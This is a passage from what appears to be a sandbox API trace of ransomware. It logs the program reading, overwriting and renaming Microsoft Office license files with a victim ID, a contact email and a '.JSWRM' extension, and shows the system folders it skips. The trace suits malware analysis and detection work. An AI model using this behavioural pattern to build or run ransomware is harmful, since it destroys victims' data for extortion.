cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0112.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.001] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0112.001] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0112.001] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0112.009] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.009] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0112.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.009] CloseHandle (hObject=0x45c) returned 1 [0112.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0112.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0112.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0112.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0112.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0112.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0112.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.010] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0112.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0112.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0112.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0112.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0112.011] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeca4ba0a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeca4ba0a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecb30867, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="VID000~1.XRM")) returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.011] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0112.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0112.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0112.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0112.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0112.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0112.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0112.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0112.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0112.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0112.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0112.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.012] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20782) returned 1 [0112.013] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0112.013] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0112.016] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.016] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0112.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.016] CloseHandle (hObject=0x45c) returned 1 [0112.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0112.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0112.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0112.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0112.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.016] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0112.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0112.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0112.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0112.018] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9d9300, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec9d9300, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecabe142, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="VI338F~1.XRM")) returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.018] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0112.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0112.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0112.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0112.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0112.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.019] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11594) returned 1 [0112.019] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0112.019] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0112.021] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.021] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0112.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.021] CloseHandle (hObject=0x45c) returned 1 [0112.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0112.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0112.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0112.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0112.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0112.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0112.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.022] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.023] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecc15677, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecc15677, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeccd4254, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="VID985~1.XRM")) returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0112.023] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0112.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0112.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0112.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0112.023] WideCharToMultiByte (in: CodePage=0xfde9, 